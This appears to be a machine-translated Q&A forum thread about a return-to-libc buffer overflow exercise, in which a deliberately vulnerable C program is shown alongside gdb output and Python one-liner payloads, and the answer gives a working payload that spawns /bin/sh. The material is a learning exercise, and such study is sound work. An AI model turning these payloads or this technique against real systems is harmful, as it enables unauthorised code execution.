我正在做this缓冲区溢出练习,但似乎无法正常工作...
在文章的调用参数部分下,他利用此程序使用变量not_used而不是/bin/date:
char* not_used = "/bin/sh";
void not_called() {
printf("Not quite a shell...\n");
system("/bin/date");
}
void vulnerable_function(char* string) {
char buffer[100];
strcpy(buffer, string);
}
int main(int argc, char** argv) {
vulnerable_function(argv[1]);
return 0;
}
他通过获取not_used和system@plt内存地址,然后用它们替换堆栈来做到这一点:
| 0x8048580 <not_used> |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system> |
| 0x42424242 <fake old %ebp> |
| 0x41414141 ... |
| ... (0x6c bytes of 'A's) |
| ... 0x41414141 |
但是,当我尝试执行此操作时,我只会得到Segmentation Fault:
frinto@kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out
Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system@plt'
$1 = {<text variable, no debug info>} 0x56556050 <system@plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb)
然后我建立了有效负载并运行它:
frinto@kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault
这里的问题可能是什么?预先感谢您的帮助!
P.S。内存随机化已禁用
答案 0 :(得分:0)
如果NX和ASLR被禁用,只需执行ret2libc,不要将其定向为功能not_called()
我使用IDA Pro找到了not_used变量的字符串地址:
/bin/sh地址= 0x08048530 system()地址= 0xb7e36da0 JUNK 利用:
`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
PoC:
% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$